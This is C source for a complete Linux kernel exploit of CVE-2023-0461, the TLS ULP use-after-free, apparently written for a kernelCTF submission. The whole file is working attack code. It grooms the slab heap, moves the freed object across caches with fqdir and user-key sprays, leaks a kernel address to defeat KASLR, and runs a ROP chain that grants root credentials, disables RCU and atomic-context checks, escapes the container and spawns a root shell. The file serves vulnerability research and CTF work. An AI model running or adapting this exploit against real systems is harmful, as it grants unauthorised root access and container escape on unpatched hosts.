/*
 *	CVE-2023-0461: Experimental mitigations bypass demonstration.
 *		by D3v17 - savy@syst3mfailure.io
 *
 *	kernelCTF{v1:mitigation-6.1-v2:1689104499:aff0301f86d328c7a295e55cfef9f318f61be153}
 *
 */

#define _GNU_SOURCE

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sched.h>
#include <fcntl.h>
#include <string.h>
#include <keyutils.h>
#include <byteswap.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/xattr.h>
#include <sys/socket.h>
#include <linux/tls.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netinet/tcp.h>
#include <netinet/in.h>

#include "netlink_utils.h"

#define UID_MAP   "/proc/self/uid_map"
#define GID_MAP   "/proc/self/gid_map"
#define SETGROUPS "/proc/self/setgroups"

#define ADD_LINK  RTM_NEWLINK
#define DEL_LINK  RTM_DELLINK
#define FLUSH     RTM_GETLINK
#define ADD_ADDR  RTM_NEWADDR
#define DEL_ADDR  RTM_DELADDR
#define ADD_QDISC RTM_NEWQDISC
#define DEL_QDISC RTM_DELQDISC
#define ADD_CLASS RTM_NEWTCLASS
#define DEL_CLASS RTM_DELTCLASS

#define N_KEYS_1 13
#define N_KEYS_2 39
#define N_NET_INTERFACES 0x1800

int kid = -1;
uint64_t kbase = 0;
int keys[0x1000];
int t1[0x100];
int t2[0x100];
int tls1, tls2;
uint64_t usr_cs, usr_ss, usr_rflags;

enum { TASK_SPRAY_FQDIR = 1, TASK_FREE_FQDIR };
struct task_shm { int state, pid; };
struct task_shm *shm;

struct user_key_payload {
	void *next, *func;
	unsigned short datalen;
	char *data[];
};

int net_if(int action, char *type, int n, int opt, bool change);

void hexdump(uint8_t * buff, size_t size)
{
	int i, j;

	for (i = 0; i < size / 8; i++) {
		if ((i % 2) == 0) {
			if (i != 0)
				printf("  \n");

			printf("  %04x  ", i * 8);
		}
		printf("0x%016lx", ((uint64_t *)buff)[i]);
		printf("    ");
	}

	putchar('\n');
}

void save_state(void)
{
    __asm__ __volatile__(
		".intel_syntax noprefix;"
		"movq %0, cs;"
		"movq %1, ss;"
		"pushfq;"
		"popq %2;"
		".att_syntax;"
		: "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags) : : "memory" );
}

void assign_to_core(int id)
{
	cpu_set_t mask;
	CPU_ZERO(&mask);
	CPU_SET(id, &mask);
	sched_setaffinity(getpid(), sizeof(mask), &mask);
}

void waitfor(int n, char *msg)
{
	char *spinner[] = { "\\", "|", "/", "-", NULL };

	for (int i = 0; i < n; i++) {
		printf("\r[%s] %s...", spinner[i % 4], msg);
		fflush(stdout);
		sleep(1);
	}

	printf("\r[✓] %s: Done.                     \n", msg);
	fflush(stdout);
}

int write_file(char *path, char *data, size_t size)
{
	int fd;

	fd = open(path, O_WRONLY | O_CREAT, 0777);

	if (fd < 0) {
		perror("[x] write_file()");
		return -1;
	}

	if (write(fd, data, size) < 0) {
		perror("[x] write_file()");
		close(fd);
		return -1;
	}

	close(fd);
	return 0;
}

int new_map(char *path, int in, int out)
{
	char buff[0x40] = { 0 };

	snprintf(buff, sizeof(buff), "%d %d 1", in, out);

	if (write_file(path, buff, strlen(buff)) < 0) {
		perror("[x] new_map() - write()");
		return -1;
	}

	return 0;
}

int setup_sandbox(void)
{
	int uid, gid;

	uid = getuid();
	gid = getgid();

	if (unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET) < 0) {
		perror("unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET)");
		return -1;
	}

	write_file(SETGROUPS, "deny", strlen("deny"));
	new_map(UID_MAP, 0, uid);
	new_map(GID_MAP, 0, gid);

	write_file("/tmp/x", "x", strlen("x"));
	net_if(ADD_LINK, "lo", -1, IFF_UP, true);

	return 0;
}

void getroot(void)
{
	char *args[] = { "/bin/bash", "-i", NULL };

	puts("[+] We are Ro0ot!");
	setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
	setns(open("/proc/1/ns/pid", O_RDONLY), 0);
	setns(open("/proc/1/ns/net", O_RDONLY), 0);
	execve(args[0], args, NULL);
}

/*
 *	Allocate a tls_context structure.
 */
int tls_ctx_alloc(int port)
{
	struct sockaddr_in addr;
	socklen_t len = sizeof(addr);
	int tls, s;

	tls = socket(AF_INET, SOCK_STREAM, 0);
	s = socket(AF_INET, SOCK_STREAM, 0);

	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = INADDR_ANY;
	addr.sin_port = htons(port);

	// Put the socket into ESTABLISHED state
	bind(s, &addr, sizeof(addr));
	listen(s, 0);
	connect(tls, &addr, sizeof(addr));
	accept(s, &addr, &len);

	// Initialize TLS ULP
	setsockopt(tls, SOL_TCP, TCP_ULP, "tls", sizeof("tls"));

	return tls;
}

/*
 *	Create a new socket that shares the same
 *	icsk_ulp_data pointer with the input socket `sk`.
 */
int clone_ulp(int sk, int port)
{
	struct sockaddr_in addr;
	socklen_t len = sizeof(addr);
	int s, new;

	s = socket(AF_INET, SOCK_STREAM, 0);

	// Disconnect the input socket `sk`
	addr.sin_family = AF_UNSPEC;
	addr.sin_addr.s_addr = INADDR_ANY;
	addr.sin_port = htons(port);
	connect(sk, &addr, sizeof(addr));

	// Listen on `sk` (This should not happen!)
	addr.sin_family = AF_INET;
	bind(sk, &addr, sizeof(addr));
	listen(sk, 0);
	connect(s, &addr, sizeof(addr));

	// Clone icsk_ulp_data
	new = accept(sk, &addr, &len);

	// Now the input socket `sk` and `new`
	// share the same icsk_ulp_data pointer
	return new;
}

/*
 *	Add / Change / Delete a network interface.
 *	Equivalent to `ip link add/change/delete ...`.
 */
int net_if(int action, char *type, int n, int opt, bool change) {

	struct nlmsghdr *msg;
	struct nlattr *opts;
	struct ifinfomsg ifinfo = {};
	struct ifaddrmsg ifaddr = {};
	char name[0x100] = { 0 };
	int sk;

	strcpy(name, type);

	if (n >= 0)
		snprintf(name, sizeof(name), "%s-%d", type, n);

	// Initalize a netlink socket and allocate a nlmsghdr
	sk = nl_init_request(action, &msg, NLM_F_REQUEST|NLM_F_CREATE);
	if (!sk) {
		perror("nl_init_request()");
		return -1;
	}

	switch (action) {
		case ADD_LINK:
		case DEL_LINK:

			ifinfo.ifi_family = AF_UNSPEC;
			ifinfo.ifi_type = PF_NETROM;
			ifinfo.ifi_index = (action == DEL_LINK) ? if_nametoindex(name) : 0;
			ifinfo.ifi_flags = opt;
			ifinfo.ifi_change = change ? 1 : 0;

			nlmsg_append(msg, &ifinfo, sizeof(ifinfo), NLMSG_ALIGNTO);

			if (action == ADD_LINK) {
				// Setting the MTU below IPV6_MIN_MTU, ipv6 is disabled
				// (https://elixir.bootlin.com/linux/v6.1/source/net/ipv6/addrconf.c#L3537)
				// This way we can get rid of an annoying timer that periodically calls qdisc->enqueue()
				nla_put_u32(msg, IFLA_MTU, 1000);
				nla_put_string(msg, IFLA_IFNAME, name);
				opts = nla_nest_start(msg, IFLA_LINKINFO);
				nla_put_string(msg, IFLA_INFO_KIND, type);
				nla_nest_end(msg, opts);
			}

			break;

		case ADD_ADDR:
		case DEL_ADDR:

			ifaddr.ifa_family = AF_INET;
			ifaddr.ifa_prefixlen = 16;
			ifaddr.ifa_flags = 0;
			ifaddr.ifa_scope = RT_SCOPE_UNIVERSE;
			ifaddr.ifa_index = if_nametoindex(name);

			nlmsg_append(msg, &ifaddr, sizeof(ifaddr), NLMSG_ALIGNTO);
			nla_put_u32(msg, IFA_LOCAL, __bswap_32(opt + n));
			nla_put_u32(msg, IFA_ADDRESS, __bswap_32(opt + n));

			break;
	}
	// Send the netlink message and deallocate resources
	return nl_complete_request(sk, msg);
}

/*
 *	Add / Delete a queue discipline.
 *	Equivalent to `tc qdisc add/delete ...`.
 *	Qdisc parameters are not relevant to exploitation unless explicitly highlighted.
 */
int tc_qdisc(int action, char *if_name, int n, char *qdisc)
{
	struct nlmsghdr *msg, *options;
	struct tcmsg tchdr;
	char name[0x100] = { 0 };
	int sk;

	snprintf(name, sizeof(name), "%s-%d", if_name, n);

	sk = nl_init_request(action, &msg, NLM_F_REQUEST|NLM_F_CREATE);
	if (!sk) {
		perror("nl_init_request()");
		return -1;
	}

	tchdr.tcm_family  = AF_UNSPEC;
	tchdr.tcm_ifindex = if_nametoindex(name);
	tchdr.tcm_handle  = 0x10000;
	tchdr.tcm_parent  = -1;
	tchdr.tcm_info    = 0;

	nlmsg_append(msg, &tchdr, sizeof(struct tcmsg), NLMSG_ALIGNTO);
	nla_put_string(msg, TCA_KIND, qdisc);

	if (action == ADD_QDISC) {
		// Allocate a tbf Qdisc in dyn-kmalloc-1k
		if (!strcmp(qdisc, "tbf")) {
			struct tc_tbf_qopt qopt = {};
			options = nlmsg_alloc();
			nla_put(options, TCA_TBF_PARMS, sizeof(qopt), &qopt);
			nla_put_u32(options, TCA_TBF_BURST, 1514); // Random burst value, not important
			nla_put_nested(msg, TCA_OPTIONS, options);
			nlmsg_free(options);
		}
		// Setup cbq Qdisc, used to allocate cbq_class objects later
		else if (!strcmp(qdisc, "cbq")) {
			struct tc_ratespec r = {};
			struct tc_cbq_lssopt lss = {};
			uint32_t rtab[256];

			r.rate = 1;
			r.mpu  = 1;
			r.cell_log = 1;
			r.overhead = 1;
			lss.change = TCF_CBQ_LSS_MAXIDLE|TCF_CBQ_LSS_EWMA|TCF_CBQ_LSS_AVPKT;
			lss.avpkt  = 1;

			options = nlmsg_alloc();
			nla_put(options, TCA_CBQ_RATE, sizeof(r), &r);
			nla_put(options, TCA_CBQ_LSSOPT, sizeof(lss),  &lss);
			nla_put(options, TCA_CBQ_RTAB, sizeof(rtab), rtab);
			nla_put_nested(msg, TCA_OPTIONS, options);
			nlmsg_free(options);
		}
	}
	return nl_complete_request(sk, msg);
}

/*
 *	Add / Delete a traffic class.
 *	Equivalent to `tc class add/delete ...`.
 *	Class parameters are not relevant to exploitation unless explicitly highlighted.
 */
int tc_class(int action, char *if_name, int n, char *class, int classid)
{
	struct nlmsghdr *msg, *options;
	struct tcmsg tchdr;
	char name[0x100] = { 0 };
	int sk;

	snprintf(name, sizeof(name), "%s-%d", if_name, n);

	sk = nl_init_request(action, &msg, NLM_F_REQUEST|NLM_F_CREATE);
	if (!sk) {
		perror("nl_init_request()");
		return -1;
	}

	tchdr.tcm_family  = AF_UNSPEC;
	tchdr.tcm_ifindex = if_nametoindex(name);
	tchdr.tcm_handle  = (1 << 16) | classid;
	tchdr.tcm_parent  = 0;
	tchdr.tcm_info    = 0;

	nlmsg_append(msg, &tchdr, sizeof(struct tcmsg), NLMSG_ALIGNTO);
	nla_put_string(msg, TCA_KIND, class);

	if (action == ADD_CLASS) {
		// Allocate cbq_class in kmalloc-512
		// This will also allocate a pfifo Qdisc in the same cache
		if (!strcmp(class, "cbq")) {
			struct tc_ratespec r = {};
			struct tc_cbq_lssopt lss = {};
			struct tc_cbq_wrropt wrr = {};
			uint32_t rtab[256];

			r.rate = 1;
			r.mpu = 1;
			r.cell_log = 1;
			r.overhead = 1;

			lss.change = TCF_CBQ_LSS_MAXIDLE|TCF_CBQ_LSS_EWMA|TCF_CBQ_LSS_AVPKT;
			lss.avpkt = 1;

			options = nlmsg_alloc();
			nla_put(options, TCA_CBQ_RATE, sizeof(r), &r);
			nla_put(options, TCA_CBQ_LSSOPT, sizeof(lss),  &lss);
			// wrropt check in the kernel is bugged (?!)
			nla_put(options, TCA_CBQ_WRROPT, sizeof(wrr),  &wrr);
			nla_put(options, TCA_CBQ_RTAB, sizeof(rtab), rtab);
			nla_put_nested(msg, TCA_OPTIONS, options);
			nlmsg_free(options);
		}
		// ...
	}
	return nl_complete_request(sk, msg);
}

/*
 *	Create a new task that will execute `func`.
 */
int start_task(int (*func)(void *))
{
	return clone(func, malloc(0x8000) + 0x8000,
			CLONE_CHILD_SETTID|CLONE_CHILD_CLEARTID|SIGCHLD, NULL);
}

/*
 *	Used to synchronize tasks.
 *	The task waits for a specific state on another core.
 */
void task_wait_state(int pid, int state)
{
	assign_to_core(1);
	while (shm->pid != pid || shm->state != state) { usleep(100); };
	assign_to_core(0);
}

/*
 *	Used to synchronize tasks.
 *	Set a state for the specified task.
 *
 *	Possible states:
 *		- TASK_SPRAY_FQDIR: The task allocates fqdir structures via unshare(CLONE_NEWNET)
 *		- TASK_FREE_FQDIR:  The task exists and fqdir structures are released
 */
void task_set_state(int pid, int state)
{
	shm->pid = pid;
	shm->state = state;
	usleep(20000);
}

/*
 *	Alloc / Free fqdir structures based on task state.
 */
int task_spray_fqdir(void *_)
{
	pid_t pid = getpid();

	task_wait_state(pid, TASK_SPRAY_FQDIR);
	// unshare(CLONE_NEWNET) will allocate 4 structures in kmalloc-512 followed by 3 fqdir
	// we need to keep this in mind for later
	unshare(CLONE_NEWNET);
	task_wait_state(pid, TASK_FREE_FQDIR);
	// When the task exits, the fqdir objects associated to the netns are released
	return 0;
}

/*
 *	Allocate a user_key_payload structure.
 */
int key_alloc(int i, char *buff, size_t size)
{
	char desc[256] = { 0 };
	key_serial_t key;
	char *payload;

	sprintf(desc, "payload_%d", i);

	size -= sizeof(struct user_key_payload);
	payload = buff ? buff : calloc(1, size);

	if (!buff)
		*(uint64_t *)&payload[0] = i; // Tag the key

	keys[i] = add_key("user", desc, payload, size, KEY_SPEC_PROCESS_KEYRING);

	if (keys[i] < 0) {
		perror("[x] key_alloc()");
		return -1;
	}

	return 0;
}

/*
 *	Get user_key_payload data.
 */
char *key_get(int i, size_t size)
{
	char *data = calloc(1, size);
	if (keyctl_read(keys[i], data, size) < 0) {
		perror("[x] key_get()");
		return NULL;
	}
	return data;
}

/*
 *	Free user_key_payload.
 */
int key_free(int i)
{
	if (keyctl_revoke(keys[i]) < 0) {
		perror("[x] keyctl_revoke()");
		return -1;
	}
	if (keyctl_unlink(keys[i], KEY_SPEC_PROCESS_KEYRING) < 0) {
		perror("[x] keyctl_unlink()");
		return -1;
	}
	return 0;
}

/*
 *	Use setxattr to initialize the chunk. (Please note that this does _not_ allocate a simple_xattr structure!)
 *	setxattr() can be useful to zero out the chunk before a subsequent allocation in the same location
 *	or to control uninitialized fields (e.g. the first two qwords of a user key).
 *
 *	Allocated/filled with user data here: https://elixir.bootlin.com/linux/v6.1/source/fs/xattr.c#L573
 *	Automatically freed here: https://elixir.bootlin.com/linux/v6.1/source/fs/xattr.c#L619
 */
void fill_chunk(char *data, size_t size)
{
	char *buff = data ? data : calloc(1, size);
	setxattr("/tmp/x", "user.x", buff, size, XATTR_CREATE);
}

/*
 *	Bypass KASLR leaking the tbf_qdisc_ops function pointer from a tbf Qdisc object.
 */
int bypass_kaslr(void)
{
	uint64_t *leak;

	for (int i = 0; i < N_KEYS_1; i++) {
		leak = (uint64_t *)key_get(i, PAGE_SIZE);
		if (!leak)
			continue;

		if (*leak) {
			kid = i;
			kbase = *leak - 0xffffffff83934b20; // tbf_qdisc_ops
			puts("[+] Cache transfer completed!");
			printf("[+] Key found: keys[%d]\n", kid);
			printf("[+] Leaked tbf_qdisc_ops: 0x%llx\n", *leak);
			printf("[+] Kernel base: 0x%llx\n", kbase + 0xffffffff00000000);
			return 0;
		}
	}

	return -1;
}

void bp(char *msg)
{
	printf("[-] Paused - %s\n", msg);
	getchar();
}

/*
 *	Hijack control flow sending packets to the interfaces.
 *	This will trigger qdisc->enqueue() aka will execute the stack pivot gadget.
 */
void abracadabra(void)
{
	struct sockaddr_pkt addr = {};
	struct msghdr msg = {};
	struct iovec msgvec = {};
	int s;

	puts("[*] Hijacking control flow...");
	s = socket(AF_PACKET, SOCK_PACKET, htons(ETH_P_ALL));

	msgvec.iov_base = "XXXXXXXXXXXXXXXXXXXXXXXX";
	msgvec.iov_len = strlen("XXXXXXXXXXXXXXXXXXXXXXXX");

	addr.spkt_family = AF_PACKET;
	msg.msg_iov = &msgvec;
	msg.msg_iovlen = 1;
	msg.msg_name = &addr;
	msg.msg_namelen = sizeof(addr);

	for (int i = 0; i < N_NET_INTERFACES; i++) {
		snprintf(addr.spkt_device, sizeof(addr.spkt_device), "%s-%d", "dummy", i);
		sendmsg(s, &msg, 0);
	}
}

/*
 *	ROP-Chain to gain root privileges and escape from the container plus two new bypasses.
 *	Bypass "Illegal context switch in RCU read-side critical section" setting current->rcu_read_lock_nesting = 0.
 *	Bypass "schedule while atomic" setting oops_in_progress = 1.
 */
void build_ropchain(char *data)
{
	int idx = 0;
	uint64_t *rop;
	char *stack;

	stack = mmap((void *)0xdead000, 0x100000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
	memset(stack, 0, 0x100000);

	*(uint64_t *)&data[0x00] = kbase + 0xffffffff81be41e4; // push rsi ; jmp qword ptr [rsi + 0x2e]
	*(uint64_t *)&data[0x08] = kbase + 0xffffffff8149d2d5; // add rsp, 0x78 ; jmp 0xffffffff82404440 (retpoline)
	*(uint64_t *)&data[0x2e] = kbase + 0xffffffff81081e5e; // pop rsp ; pop r15 ; ret

	rop = (uint64_t *)&data[0x88];

	// oops_in_progress = 1 (Bypass schedule while atomic)
	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = 1;                          // 1
	rop[idx++] = kbase + 0xffffffff810fb7dd; // pop rsi ; ret
	rop[idx++] = kbase + 0xffffffff8419f478; // oops_in_progress
	rop[idx++] = kbase + 0xffffffff81246359; // mov qword ptr [rsi], rdi ; jmp 0xffffffff82404440 (retpoline)

	// creds = prepare_kernel_cred(0)
	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = 0;                          // 0
	rop[idx++] = kbase + 0xffffffff811139d0; // prepare_kernel_cred

	// commit_creds(creds)
	rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
	rop[idx++] = 0;                          // 0
	rop[idx++] = kbase + 0xffffffff8204933b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = kbase + 0xffffffff811136f0; // commit_creds

	// current = find_task_by_vpid(getpid())
	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = getpid();                   // pid
	rop[idx++] = kbase + 0xffffffff8110a0d0; // find_task_by_vpid

	// current += offsetof(struct task_struct, rcu_read_lock_nesting)
	rop[idx++] = kbase + 0xffffffff810fb7dd; // pop rsi ; ret
	rop[idx++] = 0x46c;                      // offsetof(struct task_struct, rcu_read_lock_nesting)
	rop[idx++] = kbase + 0xffffffff8107befa; // add rax, rsi ; jmp 0xffffffff82404440 (retpoline)

	// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
	rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
	rop[idx++] = 0;                          // 0
	rop[idx++] = kbase + 0xffffffff8167104b; // mov qword ptr [rax], rcx ; jmp 0xffffffff82404440 (retpoline)

	// task = find_task_by_vpid(1)
	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = 1;                          // pid
	rop[idx++] = kbase + 0xffffffff8110a0d0; // find_task_by_vpid

	// switch_task_namespaces(task, init_nsproxy)
	rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
	rop[idx++] = 0;                          // 0
	rop[idx++] = kbase + 0xffffffff8204933b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; jmp 0xffffffff82404440 (retpoline)
	rop[idx++] = kbase + 0xffffffff810fb7dd; // pop rsi ; ret
	rop[idx++] = kbase + 0xffffffff83661680; // init_nsproxy (from parse_mount_options)
	rop[idx++] = kbase + 0xffffffff81111c80; // switch_task_namespaces

	// Back to userspace
	rop[idx++] = kbase + 0xffffffff822010c6; // swapgs_restore_regs_and_return_to_usermode + 54
	rop[idx++] = 0;
	rop[idx++] = 0;
	rop[idx++] = (uint64_t)&getroot;
	rop[idx++] = usr_cs;
	rop[idx++] = usr_rflags;
	rop[idx++] = (uint64_t)(stack + 0x80000);
	rop[idx++] = usr_ss;
}

void init_exploit(void)
{
	puts("[*] Initializing...");

	// Shared memory used to coordinate tasks
	shm = (struct task_shm *)mmap(NULL, sizeof(struct task_shm),
		PROT_READ| PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);

	// Operate on core 0 slabs
	assign_to_core(0);

	// Unshare user/net ns to setup network interfaces
	// and allocate qdisc and traffic classes
	setup_sandbox();

	// Initialize tasks to spray fqdir structures later
	#define N_SPRAY_1 2
	for (int i = 0; i < N_SPRAY_1; i++)
		t1[i] = start_task(task_spray_fqdir);

	#define N_SPRAY_2 1
	for (int i = 0; i < N_SPRAY_2; i++)
		t2[i] = start_task(task_spray_fqdir);

	// Setup network interfaces to spray tbf Qdisc later
	for (int i = 0; i < N_NET_INTERFACES; i++)
		net_if(ADD_LINK, "dummy", i, 0, false);

	// Setup a network interface and set its queue discipline to cbq
	// It will be used for heap grooming via cbq_class + pfifo Qdisc objects
	net_if(ADD_LINK, "dummy", 696, 0, false);
	tc_qdisc(ADD_QDISC, "dummy", 696, "cbq");

	// Fill partials in kmalloc-512 with cbq_class + pfifo Qdisc objects
	// both allocated by cbq_change_class() when a new cbq traffic class is created
	for (int i = 0x300; i < 0x2000; i++)
		tc_class(ADD_CLASS, "dummy", 696, "cbq", i);

	// Keep saturating kmalloc-512 with cbq_class + pfifo Qdisc objects
	for (int i = 0; i < 0x300; i++)
		tc_class(ADD_CLASS, "dummy", 696, "cbq", i);

	// Create some holes in the slab. tls_context will be allocated here.
	// This will free 2 chunks in kmalloc-512:
	// 1 cqb_class immediately, 1 pfifo Qdisc after a RCU grace period
	tc_class(DEL_CLASS, "dummy", 696, "cbq", 0x2fd);

	// Alloc tls context
	tls1 = tls_ctx_alloc(1111);
}

int main(void)
{
	char data[0x1000] = { 0 };

	save_state();
	init_exploit();

	// Trigger the vulnerability:
	// clone ULP so that two sockets share the same icsk_ulp_data pointer
	tls2 = clone_ulp(tls1, 1112);

	// [STAGE 1] Cache transfer
	// Transfer exploitation primitives from kmalloc-512 to dyn-kmalloc-1k

	// Step 1.0 - Close the first socket
	// icsk_ulp_data (tls_context) is freed but still accessible from the second socket
	close(tls1);

	// Wait for the RCU grace period:
	// usually sleep(1) is enough, but for tls_context sometimes it takes longer ¯\_(ツ)_/¯
	waitfor(6, "Freeing ctx");

	// Step 1.1 - Close the second socket and before the icsk_ulp_data pointer (tls_context)
	// is freed again (during the RCU grace period) replace it with a fqdir object
	close(tls2);
	for (int i = 0; i < N_SPRAY_1; i++)
		task_set_state(t1[i], TASK_SPRAY_FQDIR);

	// Wait for the RCU grace period. Again, longer than usual
	// The fqdir object will be freed instead of tls_context
	waitfor(6, "Spraying F1");

	// Step 1.2 - Overlap another fqdir to the freed one
	// After the spray the bucket_table pointers of both objects will point to the same table
	for (int i = 0; i < N_SPRAY_2; i++)
		task_set_state(t2[i], TASK_SPRAY_FQDIR);
	waitfor(1, "Spraying F2"); // Wait for tasks

	// Step 1.3 - Free one of the overlapped fqdir objects
	// This will also free the shared bucket_table in dyn-kmalloc-1k
	for (int i = 0; i < N_SPRAY_2; i++)
		task_set_state(t2[i], TASK_FREE_FQDIR);
	waitfor(1, "Freeing F2"); // Wait for tasks

	// Free the chunks in kmalloc-512 to bypass mm/slub.c:720
	for (int i = 0; i < 0x2fc; i++)
		tc_class(DEL_CLASS, "dummy", 696, "cbq", i);

	puts("[*] Spraying keys...");

	// Step 1.4 - Replace the bucket_table in dyn-kmalloc-1k with a user_key_payload
	// After the spray, the bucket_table pointer of the other fqdir will point to the user key
	for (int i = 0; i < N_KEYS_1; i++) {
		// Here fill_chunk() is used to zero out uninitialized memory before the user key is allocated.
		// We need to make sure the first two qwords of the user key (struct rcu_head) are zero to make the kernel happy
		// Basically we are faking bucket_table->size = 0 and bucket_table->nest = 0
		fill_chunk(NULL, 1024);
		key_alloc(i, data, 512 + 1);

		// When a user key is allocated, another structure is allocated and automatically freed in kmalloc-512
		// Sleeping for a while is helpful to make sure it is always allocated in the same chunk
		// Useful to minimize noise in kmalloc-512
		usleep(30000);
	}

	// Step 1.5 - Now free the other fqdir
	// The user key pointed by the bucket_table pointer will be arbitrarily freed
	for (int i = 0; i < N_SPRAY_1; i++)
		task_set_state(t1[i], TASK_FREE_FQDIR);
	waitfor(2, "Freeing F1");

	// [STAGE 2] KASLR Bypass
	// Cache transfer is completed, now corrupt the user key in dyn-kmalloc-1k
	// with a tbf Qdisc object and leak the tbf_qdisc_ops pointer

	// Step 2.0 - Overwrite the user key with a tbf Qdisc structure
	for (int i = 0; i < N_NET_INTERFACES; i++) {
		// Alloc tbf Qdisc in dyn-kmalloc-1k
		tc_qdisc(ADD_QDISC, "dummy", i, "tbf");
		// Put the network interface up so it can receive packets later
		net_if(ADD_LINK, "dummy", i, IFF_UP, true);
	}

	// Step 2.1 - Leak tbf_qdisc_ops
	if (bypass_kaslr() < 0)
		goto error;

	// [STAGE 3] RIP control
	// Corrupt qdisc->enqueue() and send packets to the network interface to hijack control flow

	// Step 3.0 - Free all the keys
	for (int i = 0; i < N_KEYS_1; i++)
		if (i != kid)
			key_free(i);

	// Free the corrupted key causing a UAF over the Qdisc object
	key_free(kid);
	waitfor(1, "Freeing keys"); // RCU grace period

	build_ropchain(data);
	puts("[+] ROP-chain ready:");
	hexdump(data, 0x100);

	// Step 3.1 - Finally reallocate the keys to overwrite the Qdisc structure.
	// qdisc->enqueue() is overwritten by a stack pivot gadget
	puts("[*] Reallocating keys...");
	for (int i = 0; i < N_KEYS_2; i++) {
		/*
		 *	With user_key_payload, we can only control data after offset 0x18,
		 *	but offsetof(struct Qdisc, enqueue) is 0, so we need to use fill_chunk()
		 *	(setxattr) before allocating the key to control the first two uninitialized qwords (struct rcu_head).
		 *	Basically setxattr() is used to write the first two gadgets at offset 0x00 and 0x08.
		 */
		fill_chunk(data, 512 + 1);
		key_alloc(i, data + 24, 512 + 1);
	}

	// Step 3.2 - Send packets to the network interface to hijack
	// control flow when qdisc->enqueue() is called
	abracadabra();
	return 0;

error:
	puts("[x] Exploit failed, try again.");
	return -1;
}
